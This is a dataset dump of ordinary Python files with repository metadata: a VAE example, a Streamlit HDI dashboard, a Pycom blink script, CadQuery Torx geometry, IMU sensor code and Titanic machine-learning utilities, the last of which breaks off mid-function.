quality signals (*_quality_signal): num_words 636 | num_chars 4,629 | mean_word_length 4.97956 | frac_words_unique 0.264151 | frac_chars_top_2/3/4grams 0.022734 / 0.037891 / 0.030313 | frac_chars_dupe_5-10grams 0.34228 / 0.332807 / 0.278813 / 0.278813 / 0.278813 / 0.262078 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.012977 | frac_chars_whitespace 0.151005 | size_file_byte 4,629 | num_lines 141 | num_chars_line_max 141 | num_chars_line_mean 32.829787 | frac_chars_alphabet 0.792875 | frac_chars_comments 0.04623 | cate_xml_start 0 | frac_lines_dupe_lines 0.181034 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.079145 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.068966 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.077586 | frac_lines_simplefunc 0 | score_lines_no_logic 0.206897 | frac_lines_print 0.043103
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: cdfcd2a90ed7ec6257eb01c41e93f4909519bbec | size: 3,427 | ext: py | lang: Python
repo: zhangyewu/edward | path: examples/vae.py | head_hexsha: 8ec452eb0a3801df8bda984796034a9e945faec7 | licenses: ["Apache-2.0"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: 5,200 (2016-05-03T04:59:01.000Z – 2022-03-31T03:32:26.000Z) | max_issues_count: 724 (2016-05-04T09:04:37.000Z – 2022-02-28T02:41:12.000Z) | max_forks_count: 1,004 (2016-05-03T22:45:14.000Z – 2022-03-25T00:08:08.000Z)
content:
"""Variational auto-encoder for MNIST data.
References
----------
http://edwardlib.org/tutorials/decoder
http://edwardlib.org/tutorials/inference-networks
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import edward as ed
import numpy as np
import os
import tensorflow as tf
from edward.models import Bernoulli, Normal
from edward.util import Progbar
from observations import mnist
from scipy.misc import imsave
tf.flags.DEFINE_string("data_dir", default="/tmp/data", help="")
tf.flags.DEFINE_string("out_dir", default="/tmp/out", help="")
tf.flags.DEFINE_integer("M", default=100, help="Batch size during training.")
tf.flags.DEFINE_integer("d", default=2, help="Latent dimension.")
tf.flags.DEFINE_integer("n_epoch", default=100, help="")
FLAGS = tf.flags.FLAGS
if not os.path.exists(FLAGS.out_dir):
os.makedirs(FLAGS.out_dir)
def generator(array, batch_size):
"""Generate batch with respect to array's first axis."""
start = 0 # pointer to where we are in iteration
while True:
stop = start + batch_size
diff = stop - array.shape[0]
if diff <= 0:
batch = array[start:stop]
start += batch_size
else:
batch = np.concatenate((array[start:], array[:diff]))
start = diff
batch = batch.astype(np.float32) / 255.0 # normalize pixel intensities
batch = np.random.binomial(1, batch) # binarize images
yield batch
def main(_):
ed.set_seed(42)
# DATA. MNIST batches are fed at training time.
(x_train, _), (x_test, _) = mnist(FLAGS.data_dir)
x_train_generator = generator(x_train, FLAGS.M)
# MODEL
# Define a subgraph of the full model, corresponding to a minibatch of
# size M.
z = Normal(loc=tf.zeros([FLAGS.M, FLAGS.d]),
scale=tf.ones([FLAGS.M, FLAGS.d]))
hidden = tf.layers.dense(z, 256, activation=tf.nn.relu)
x = Bernoulli(logits=tf.layers.dense(hidden, 28 * 28))
# INFERENCE
# Define a subgraph of the variational model, corresponding to a
# minibatch of size M.
x_ph = tf.placeholder(tf.int32, [FLAGS.M, 28 * 28])
hidden = tf.layers.dense(tf.cast(x_ph, tf.float32), 256,
activation=tf.nn.relu)
qz = Normal(loc=tf.layers.dense(hidden, FLAGS.d),
scale=tf.layers.dense(
hidden, FLAGS.d, activation=tf.nn.softplus))
# Bind p(x, z) and q(z | x) to the same TensorFlow placeholder for x.
inference = ed.KLqp({z: qz}, data={x: x_ph})
optimizer = tf.train.RMSPropOptimizer(0.01, epsilon=1.0)
inference.initialize(optimizer=optimizer)
tf.global_variables_initializer().run()
n_iter_per_epoch = x_train.shape[0] // FLAGS.M
for epoch in range(1, FLAGS.n_epoch + 1):
print("Epoch: {0}".format(epoch))
avg_loss = 0.0
pbar = Progbar(n_iter_per_epoch)
for t in range(1, n_iter_per_epoch + 1):
pbar.update(t)
x_batch = next(x_train_generator)
info_dict = inference.update(feed_dict={x_ph: x_batch})
avg_loss += info_dict['loss']
# Print a lower bound to the average marginal likelihood for an
# image.
avg_loss /= n_iter_per_epoch
avg_loss /= FLAGS.M
print("-log p(x) <= {:0.3f}".format(avg_loss))
# Prior predictive check.
images = x.eval()
for m in range(FLAGS.M):
imsave(os.path.join(FLAGS.out_dir, '%d.png') % m,
images[m].reshape(28, 28))
if __name__ == "__main__":
tf.app.run()
avg_line_length: 31.731481 | max_line_length: 77 | alphanum_fraction: 0.676685
quality signals (*_quality_signal): num_words 522 | num_chars 3,427 | mean_word_length 4.293103 | frac_words_unique 0.356322 | frac_chars_top_2/3/4grams 0.018742 / 0.029005 / 0.023204 | frac_chars_dupe_5-10grams 0.091923 / 0.055332 / 0.033021 / 0.033021 / 0 / 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.020158 | frac_chars_whitespace 0.189378 | size_file_byte 3,427 | num_lines 107 | num_chars_line_max 78 | num_chars_line_mean 32.028037 | frac_chars_alphabet 0.786537 | frac_chars_comments 0.195214 | cate_xml_start 0 | frac_lines_dupe_lines 0 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.048664 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.028571 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.157143 | frac_lines_simplefunc 0 | score_lines_no_logic 0.185714 | frac_lines_print 0.042857
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a804975ed4327041257e7e887706be1ffc7b7803 | size: 2,829 | ext: py | lang: Python
repo: Raisler/Brazil_HDI_DataVisualization | path: app.py | head_hexsha: 76dde95dd1a7171e30a4a2e180a9ecdcea6f8c7c | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
import streamlit as st
import pandas as pd
import numpy as np
import plotly.express as px
from plotly.subplots import make_subplots
import plotly.graph_objects as go
import matplotlib.pyplot as plt
def load_data(data):
data=pd.read_csv(data)
return data
df = load_data('hdi.csv')
st.title('Human Development Index in Brazil')
select = st.sidebar.selectbox('Choose', ['Home', 'Analysis by Year', 'Analysis by State'])
if select == 'Home':
    st.write('This is a dashboard for exploring the HDI of all states in Brazil; you can view charts and values!')
    st.write('More improvements coming soon. #Version 1')
    st.write('Choose an option in the sidebar for the view that suits you best!')
st.write('Author: Raisler Voigt | suggestions? raisler.dev@gmail.com')
st.markdown('''<p align="center">
<a href="https://www.instagram.com/raislervoigt/" target="_blank" rel="noopener noreferrer">Instagram</a> •
<a href="https://twitter.com/VoigtRaisler" target="_blank" rel="noopener noreferrer">Twitter</a> •
<a href="https://www.linkedin.com/in/raisler-voigt7/" target="_blank" rel="noopener noreferrer">Linkedin</a> •
<a href="https://github.com/Raisler" target="_blank" rel="noopener noreferrer">GitHub</a>
</p>''', unsafe_allow_html=True)
if select == 'Analysis by Year':
    select1 = st.sidebar.selectbox('Analysis by Year', [2017, 2010, 2000, 1991])
fig1 = px.scatter(df, x="HDI Health {0}".format(select1), y="HDI Education {0}".format(select1), size="HDI {0}".format(select1), color="UF")
fig2 = px.histogram(df, x="UF", y = "HDI {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig3 = px.histogram(df, x="UF", y = "HDI Education {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig4 = px.histogram(df, x="UF", y = "HDI Health {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig5 = px.histogram(df, x="UF", y = "HDI Wealth {0}".format(select1)).update_xaxes(categoryorder='total descending')
fig6 = df[['UF', "HDI Education {0}".format(select1), "HDI Health {0}".format(select1), "HDI Wealth {0}".format(select1)]]
st.write(fig1)
st.write(fig2)
st.subheader('HDI Education')
st.write(fig3)
st.subheader('HDI Health')
st.write(fig4)
st.subheader('HDI Wealth')
st.write(fig5)
st.write(fig6)
if select == 'Analysis by State':
select2 = st.sidebar.selectbox('Choose the State', df['UF'])
cdf = df
cdf.index = cdf['UF']
state = cdf.index == '{}'.format(select2)
state = cdf[state]
trans = state.transpose()
trans = trans.sort_index(ascending = False)
fig1 = px.histogram(x = trans.index, y = trans['{}'.format(select2)]).update_xaxes(categoryorder='total descending')
fig2 = state.transpose()
st.write(fig1)
st.write(fig2)
avg_line_length: 40.414286 | max_line_length: 144 | alphanum_fraction: 0.679392
quality signals (*_quality_signal): num_words 409 | num_chars 2,829 | mean_word_length 4.665037 | frac_words_unique 0.342298 | frac_chars_top_2/3/4grams 0.044025 / 0.073375 / 0.075996 | frac_chars_dupe_5-10grams 0.357442 / 0.194969 / 0.15304 / 0.111111 / 0 / 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.024237 | frac_chars_whitespace 0.154118 | size_file_byte 2,829 | num_lines 69 | num_chars_line_max 145 | num_chars_line_mean 41 | frac_chars_alphabet 0.771835 | frac_chars_comments 0 | cate_xml_start 0 | frac_lines_dupe_lines 0.075472 | cate_autogen 0 | frac_lines_long_string 0.09434 | frac_chars_string_length 0.392011 | frac_chars_long_word_length 0.04065 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.018868 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.132075 | frac_lines_simplefunc 0 | score_lines_no_logic 0.169811 | frac_lines_print 0
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a804e02acc0b6d5ed28538bc5bf647eab91b6259 | size: 657 | ext: py | lang: Python
repo: sophie-bernier/RemoteOceanAcidificationMonitor | path: Examples/pycomBlink/main.py | head_hexsha: 6a8b799826a2eb9b1d5064883193c61eea0ee310 | licenses: ["Unlicense"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: 1 (2021-06-22T23:07:31.000Z – 2021-06-22T23:07:31.000Z) | max_issues_count: null | max_forks_count: null
content:
# main.py
import pycom
import time
pycom.heartbeat(False)
red = 0x08
blue = 0x00
green = 0x00
sleepTime = 0.01
def setRgb(red, green, blue):
rgbValue = 0x000000
rgbValue |= (red << 16) | (green << 8) | blue
pycom.rgbled(rgbValue)
return
while True:
###
#if red >= 0x08:
# if green > 0:
# green -= 1
# else:
# blue += 1
#if blue >= 0x08:
# if red > 0:
# red -= 1
# else:
# green += 1
#if green >= 0x08:
# if blue > 0:
# blue -= 1
# else:
# red += 1
###
setRgb(red, green, blue)
time.sleep(sleepTime)
avg_line_length: 16.425 | max_line_length: 49 | alphanum_fraction: 0.464231
quality signals (*_quality_signal): num_words 77 | num_chars 657 | mean_word_length 3.961039 | frac_words_unique 0.376623 | frac_chars_top_2/3/4grams 0.059016 / 0.091803 / 0.118033 | frac_chars_dupe_5-10grams all 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.101266 | frac_chars_whitespace 0.398782 | size_file_byte 657 | num_lines 39 | num_chars_line_max 50 | num_chars_line_mean 16.846154 | frac_chars_alphabet 0.670886 | frac_chars_comments 0.35312 | cate_xml_start 0 | frac_lines_dupe_lines 0 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0.05 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.066667 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.133333 | frac_lines_simplefunc 0 | score_lines_no_logic 0.266667 | frac_lines_print 0
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a8054920242ac3e7b7e99120e329e53db3f718af | size: 1,891 | ext: py | lang: Python
repo: expressionsofchange/nerf0 | path: dsn/pp/construct.py | head_hexsha: 788203619fc89c92e8c7301d62bbc4f1f4ee66e1 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: 2 (2019-04-30T05:42:05.000Z – 2019-08-11T19:17:20.000Z) | max_issues_count: null | max_forks_count: null
content:
from spacetime import get_s_address_for_t_address
from s_address import node_for_s_address
from dsn.s_expr.structure import TreeText
from dsn.pp.structure import PPNone, PPSingleLine, PPLispy, PPAnnotatedSExpr
from dsn.pp.clef import PPUnset, PPSetSingleLine, PPSetLispy
def build_annotated_tree(node, default_annotation):
if isinstance(node, TreeText):
annotated_children = []
else:
annotated_children = [build_annotated_tree(child, default_annotation) for child in node.children]
return PPAnnotatedSExpr(
node,
default_annotation,
annotated_children,
)
def construct_pp_tree(tree, pp_annotations):
"""Because pp notes take a t_address, they can be applied on future trees (i.e. the current tree).
The better (more general, more elegant and more performant) solution is to build the pp_tree in sync with the
general tree, and have construct_pp_tree be a function over notes from those clefs rather than on trees.
"""
annotated_tree = build_annotated_tree(tree, PPNone())
for annotation in pp_annotations:
pp_note = annotation.annotation
s_address = get_s_address_for_t_address(tree, pp_note.t_address)
if s_address is None:
continue # the node no longer exists
annotated_node = node_for_s_address(annotated_tree, s_address)
if isinstance(pp_note, PPUnset):
new_value = PPNone()
elif isinstance(pp_note, PPSetSingleLine):
new_value = PPSingleLine()
elif isinstance(pp_note, PPSetLispy):
new_value = PPLispy()
else:
raise Exception("Unknown PP Note")
# let's just do this mutably first... this is the lazy approach (but that fits with the caveats mentioned at the
# top of this method)
annotated_node.annotation = new_value
return annotated_tree
avg_line_length: 35.679245 | max_line_length: 120 | alphanum_fraction: 0.710206
quality signals (*_quality_signal): num_words 253 | num_chars 1,891 | mean_word_length 5.086957 | frac_words_unique 0.391304 | frac_chars_top_2/3/4grams 0.049728 / 0.041958 / 0.021756 | frac_chars_dupe_5-10grams 0.034188 / 0.034188 / 0 / 0 / 0 / 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0 | frac_chars_whitespace 0.230566 | size_file_byte 1,891 | num_lines 52 | num_chars_line_max 121 | num_chars_line_mean 36.365385 | frac_chars_alphabet 0.884536 | frac_chars_comments 0.248017 | cate_xml_start 0 | frac_lines_dupe_lines 0.060606 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.010707 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.060606 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.151515 | frac_lines_simplefunc 0 | score_lines_no_logic 0.272727 | frac_lines_print 0
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a8065cec94c9ac0bb277d2b7b2c4a7aa013dd5ba | size: 3,285 | ext: py | lang: Python
repo: sprightlyManifesto/cadQuery2 | path: pallet.py | head_hexsha: 207a1ff2420210460539400dfd1945e8b7245497 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: 1 (2021-05-31T00:08:02.000Z – 2021-05-31T00:08:02.000Z) | max_issues_count: null | max_forks_count: null
content:
import cadquery as cq  # the __main__ block uses the cq alias, which "from cadquery import *" does not provide
from cadquery import *
from math import sin, cos, acos, asin, pi, atan2
class Pallet:
def __init__(self):
self.torx6 = { 6:(1.75,1.27), 8:(2.4,1.75), 10:(2.8,2.05), 15:(3.35,2.4), 20:(3.95,2.85),
25:(4.50,3.25), 30:(5.6,4.05), 40:(6.75,4.85),45:(7.93,5.64), 50:(8.95,6.45),
55:(11.35,8.05),60:(13.45,9.6),70:(15.7,11.2),80:(17.75,12.8),90:(20.2,14.4),
100:(22.4,16)}
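    # torx6 maps a Torx size (T6..T100) to (A, B): the outer point-to-point
    # diameter and the inner valley diameter (values appear to be millimetres)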
def radialSlot(self,wp,slotRad, cutterRad, a1, a2,offset=(0,0)):
if slotRad > cutterRad:
IR = slotRad-cutterRad
OR = slotRad+cutterRad
middle = a1+(a2-a1)/2
result = (wp.moveTo(IR*sin(a1),IR*cos(a1))
.threePointArc((IR*sin(middle),IR*cos(middle)),(IR*sin(a2),IR*cos(a2)))
.tangentArcPoint((cutterRad*2*sin(a2),cutterRad*2*cos(a2)))
.threePointArc((OR*sin(middle),OR*cos(middle)),(OR*sin(a1),OR*cos(a1)))
.tangentArcPoint((-cutterRad*2*sin(a1),-cutterRad*2*cos(a1))).close()
)
else:
result = wp
#log("issues")
return(result)
def hexAF(self,wp,af):
R = af/cos(pi/6)/2
return wp.moveTo(-sin(pi/6)*R,af/2).lineTo(sin(pi/6)*R,af/2).lineTo(R,0)\
.lineTo(sin(pi/6)*R,-af/2).lineTo(-sin(pi/6)*R,-af/2).lineTo(-R,0).close()
def torx(self,wp,no):
A , B = self.torx6[no]
re=A*0.1
ri=A*0.175
x = ri*(sin(pi/6)*(A/2-re))/(re + ri)
y1 = B/2 + ri
y2 = cos(pi/6)*(A/2 - re)
y = y1 - ri*((y1 -y2))/(re + ri)
#log(f"x:{x} y1:{y1} y2:{y2}")
phi = atan2(x,y)
#log(f"phi:{round(phi,2)} x:{round(x,2)} y:{round(y,2)} re:{round(re,2)} ri:{round(ri,2)}")
R = (x**2+y**2)**0.5
Rm = A/2
B = B/2
res = wp.moveTo(R*sin(-phi),R*cos(-phi)).threePointArc((0,B),(R*sin(phi),R*cos(phi))) \
.threePointArc((Rm*sin(pi/6),Rm*cos(pi/6)),(R*sin(pi/3-phi),R*cos(pi/3-phi))) \
.threePointArc((B*sin(pi/3), B*cos(pi/3)),(R*sin(phi+pi/3),R*cos(phi+pi/3))) \
.threePointArc((Rm*sin(3*pi/6),Rm*cos(3*pi/6)),(R*sin(2*pi/3-phi),R*cos(2*pi/3-phi))) \
.threePointArc((B*sin(2*pi/3), B*cos(2*pi/3)),(R*sin(phi+2*pi/3),R*cos(phi+2*pi/3))) \
.threePointArc((Rm*sin(5*pi/6),Rm*cos(5*pi/6)),(R*sin(3*pi/3-phi),R*cos(3*pi/3-phi))) \
.threePointArc((B*sin(3*pi/3), B*cos(3*pi/3)),(R*sin(phi+3*pi/3),R*cos(phi+3*pi/3))) \
.threePointArc((Rm*sin(7*pi/6),Rm*cos(7*pi/6)),(R*sin(4*pi/3-phi),R*cos(4*pi/3-phi))) \
.threePointArc((B*sin(4*pi/3), B*cos(4*pi/3)),(R*sin(phi+4*pi/3),R*cos(phi+4*pi/3))) \
.threePointArc((Rm*sin(9*pi/6),Rm*cos(9*pi/6)),(R*sin(5*pi/3-phi),R*cos(5*pi/3-phi))) \
.threePointArc((B*sin(5*pi/3), B*cos(5*pi/3)),(R*sin(phi+5*pi/3),R*cos(phi+5*pi/3))) \
.threePointArc((Rm*sin(11*pi/6),Rm*cos(11*pi/6)),(R*sin(6*pi/3-phi),R*cos(6*pi/3-phi))) \
.close()
return res
if __name__== "__main__":
p = Pallet()
ks = list(p.torx6.keys())
ks.reverse()
a = cq.Workplane().circle(12).extrude(-3)
for k in ks:
a = a.union(p.torx(a.faces(">Z").workplane(),k).extrude(1))
avg_line_length: 48.308824 | max_line_length: 101 | alphanum_fraction: 0.497717
quality signals (*_quality_signal): num_words 626 | num_chars 3,285 | mean_word_length 2.592652 | frac_words_unique 0.178914 | frac_chars_top_2/3/4grams 0.05915 / 0.044362 / 0.029575 | frac_chars_dupe_5-10grams 0.321627 / 0.149723 / 0.078866 / 0.045595 / 0.041898 / 0.041898 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.111997 | frac_chars_whitespace 0.236225 | size_file_byte 3,285 | num_lines 68 | num_chars_line_max 102 | num_chars_line_mean 48.308824 | frac_chars_alphabet 0.534874 | frac_chars_comments 0.040487 | cate_xml_start 0 | frac_lines_dupe_lines 0 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.003175 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.067797 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.033898 | frac_lines_simplefunc 0 | score_lines_no_logic 0.152542 | frac_lines_print 0
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a8094575efb5f9d3bcb611dcb83074209e70f07f | size: 478 | ext: py | lang: Python
repo: KenWoo/Algorithm | path: Algorithms/Easy/830. Positions of Large Groups/answer.py | head_hexsha: 4012a2f0a099a502df1e5df2e39faa75fe6463e8 | licenses: ["Apache-2.0"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
from typing import List
class Solution:
def largeGroupPositions(self, S: str) -> List[List[int]]:
l = []
start = end = 0
while start < len(S):
while end < len(S) and S[start] == S[end]:
end += 1
if end - start >= 3:
l.append([start, end - 1])
start = end
return l
if __name__ == "__main__":
s = Solution()
result = s.largeGroupPositions("abc")
print(result)
avg_line_length: 22.761905 | max_line_length: 61 | alphanum_fraction: 0.493724
quality signals (*_quality_signal): num_words 57 | num_chars 478 | mean_word_length 4 | frac_words_unique 0.508772 | frac_chars_top_2/3/4grams 0.105263 / 0 / 0 | frac_chars_dupe_5-10grams all 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.013468 | frac_chars_whitespace 0.378661 | size_file_byte 478 | num_lines 20 | num_chars_line_max 62 | num_chars_line_mean 23.9 | frac_chars_alphabet 0.754209 | frac_chars_comments 0 | cate_xml_start 0 | frac_lines_dupe_lines 0 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.023013 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.0625 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.0625 | frac_lines_simplefunc 0 | score_lines_no_logic 0.25 | frac_lines_print 0.0625
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a80a22c9f777e08edf7fe7ed83b93c4fd1e307bc | size: 1,727 | ext: py | lang: Python
repo: aume1/SatelliteTracker | path: imu.py | head_hexsha: 62725e1d1a72a1350b2af15d9e33fcd574ceb3a2 | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: 2 (2021-06-19T17:17:30.000Z – 2021-06-19T17:17:39.000Z) | max_issues_count: null | max_forks_count: 1 (2021-06-19T17:18:32.000Z – 2021-06-19T17:18:32.000Z)
content:
import time
import math
import py_qmc5883l
import pigpio
import adafruit_bmp280
from i2c_ADXL345 import ADXL345
import numpy as np
from i2c_ITG3205 import Gyro
class IMU:
def __init__(self, pi):
self.gyro = Gyro(pi)
self.accel = ADXL345(pi)
self.mag = py_qmc5883l.QMC5883L(pi)
rpy = list(self.get_roll_pitch_yaw())
self._prev_time = time.time()
def get_accel(self):
return self.accel.get_xyz_accel()
def get_gyro(self):
return self.gyro.get_rotations()
def get_mag(self):
return self.mag.get_dir()
def get_north(self):
D = self.get_accel()
D_mag = math.sqrt(D[0]**2 + D[1]**2 + D[2]**2)
D = [x/D_mag for x in D]
# D = [x for x in acc_unit] # used to be negative, flipped sensor so it is positive now
E = np.cross(D, self.get_mag()) # east is the cross-product of down and the direction of magnet
e_mag = math.sqrt(E[0]**2 + E[1]**2 + E[2]**2)
E /= e_mag
N = np.cross(E, D) # north is the cross-product of east and down
n_mag = math.sqrt(N[0] ** 2 + N[1] ** 2 + N[2] ** 2)
N /= n_mag
return N
def get_roll_pitch_yaw(self):
x, y, z = self.get_accel()
x_Buff = float(x)
y_Buff = float(y)
z_Buff = float(z)
roll = 180 + math.atan2(y_Buff, z_Buff) * 57.3
pitch = math.atan2((- x_Buff), math.sqrt(y_Buff * y_Buff + z_Buff * z_Buff)) * 57.3
if roll > 180:
roll -= 360
yaw = self.mag.get_bearing()
return roll, pitch, yaw
if __name__ == "__main__":
pi = pigpio.pi('192.168.178.229')
imu = IMU(pi)
while True:
print(imu.get_roll_pitch_yaw())
avg_line_length: 28.311475 | max_line_length: 104 | alphanum_fraction: 0.579618
quality signals (*_quality_signal): num_words 286 | num_chars 1,727 | mean_word_length 3.300699 | frac_words_unique 0.307692 | frac_chars_top_2/3/4grams 0.03178 / 0.050847 / 0.047669 | frac_chars_dupe_5-10grams 0.105932 / 0 / 0 / 0 / 0 / 0 | frac_chars_replacement_symbols 0 | frac_chars_digital 0.063167 | frac_chars_whitespace 0.294152 | size_file_byte 1,727 | num_lines 60 | num_chars_line_max 105 | num_chars_line_mean 28.783333 | frac_chars_alphabet 0.711239 | frac_chars_comments 0.110596 | cate_xml_start 0 | frac_lines_dupe_lines 0 | cate_autogen 0 | frac_lines_long_string 0 | frac_chars_string_length 0.015023 | frac_chars_long_word_length 0 | frac_lines_string_concat 0 | cate_encoded_data 0 | frac_chars_hex_words 0 | frac_lines_prompt_comments 0 | frac_lines_assert 0
codepython signals: cate_ast 1 | frac_lines_func_ratio 0.125 | cate_var_zero false | frac_lines_pass 0 | frac_lines_import 0.166667 | frac_lines_simplefunc 0.0625 | score_lines_no_logic 0.416667 | frac_lines_print 0.020833
unsuffixed qsc_* duplicate columns: all 0 (frac_words_unique and frac_lines_string_concat: null) | effective: 1 | hits: 0

---
hexsha: a80b6a8d0bacba13b3fe61daf36962d8ad3001a4 | size: 8,892 | ext: py | lang: Python
repo: buffbob/titanic | path: src/titanic/tit_utils.py | head_hexsha: 1e52814076ad78f6f9845d7b8f829889977a907b | licenses: ["MIT"] (identical across the max_stars, max_issues and max_forks views)
max_stars_count: null | max_issues_count: null | max_forks_count: null (all event datetimes null)
content:
import pandas as pd
from sklearn.model_selection import GridSearchCV, train_test_split, cross_val_score
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import accuracy_score, classification_report
import matplotlib.pyplot as plt
import numpy as np
import category_encoders as ce
from sklearn.preprocessing import StandardScaler, LabelEncoder, OneHotEncoder, OrdinalEncoder
def load_tit(path):
"""
downloads data from kaggle stored at path = "../Data/"
returns a tuple of our titanic datasets- (train,test)
"""
train = pd.read_csv(path + 'tit_train.csv')
test = pd.read_csv(path + "tit_test.csv")
return (train, test)
def gscv_results_terse(model, params, X_train, y_train, X_test, y_test):
'''
clf = a classifier, params = a dict to feed to gridsearch_cv, score_list = list of evaluation metrics
nuff said
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
clf = GridSearchCV(model, params, cv=10,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set: \n{}".format(clf.best_params_))
print('___________________________________')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.3} with a std of {:.3}'.format(np.mean(scores), np.std(scores)))
return clf
def print_gscv_results(model, params, X_train, y_train, X_test, y_test):
'''
clf = a classifier, params = a dict to feed to gridsearch_cv, score_list = list of evaluation metrics
'''
scores = ["accuracy"]
for score in scores:
print("# Tuning hyper-parameters for %s" % score)
print()
clf = GridSearchCV(model, params, cv=5,
scoring=score)
clf.fit(X_train, y_train)
print("Best parameters set found on development set:")
print()
print(clf.best_params_)
print()
print("Grid scores on development set:")
print()
means = clf.cv_results_['mean_test_score']
stds = clf.cv_results_['std_test_score']
for mean, std, params in zip(means, stds, clf.cv_results_['params']):
print("%0.3f (+/-%0.03f) for %r"
% (mean, std * 2, params))
print()
print("Detailed classification report:")
print()
print("The model is trained on the full development set.")
print("The scores are computed on the full evaluation set.")
print()
y_true, y_pred = y_test, clf.predict(X_test)
print(classification_report(y_true, y_pred))
print('________________________________________________')
print('best params for model are {}'.format(clf.best_params_))
print('\n___________________________________\n')
print('cv scores on the best estimator')
scores = cross_val_score(clf.best_estimator_, X_train, y_train, scoring="accuracy", cv=10)
print(scores)
print('the average cv score is {:.2}\n\n'.format(np.mean(scores)))
return clf
def visualize_classifier(model, X, y, ax=None, cmap='rainbow'):
"""
X is a 2D dataset
nuf said
"""
ax = ax or plt.gca()
# Plot the training points
ax.scatter(X.iloc[:, 0], X.iloc[:, 1], c=y, s=30, cmap=cmap,
clim=(y.min(), y.max()), zorder=3)
ax.axis('tight')
ax.axis('off')
xlim = ax.get_xlim()
ylim = ax.get_ylim()
# fit the estimator
model.fit(X, y)
xx, yy = np.meshgrid(np.linspace(*xlim, num=200),
np.linspace(*ylim, num=200))
Z = model.predict(np.c_[xx.ravel(), yy.ravel()]).reshape(xx.shape)
# Create a color plot with the results
n_classes = len(np.unique(y))
contours = ax.contourf(xx, yy, Z, alpha=0.3,
levels=np.arange(n_classes + 1) - 0.5,
cmap=cmap, clim=(y.min(), y.max()),
zorder=1)
ax.set(xlim=xlim, ylim=ylim)
# this dataset has unique cols so we will go through one by one
def pp_Embarked(df):
"""
simply adds 'C' where missing values are present
inplace imputation
return df
"""
df.Embarked.fillna("C", inplace=True)
return df
def pp_Name(df):
"""
extracts the title from the Name column
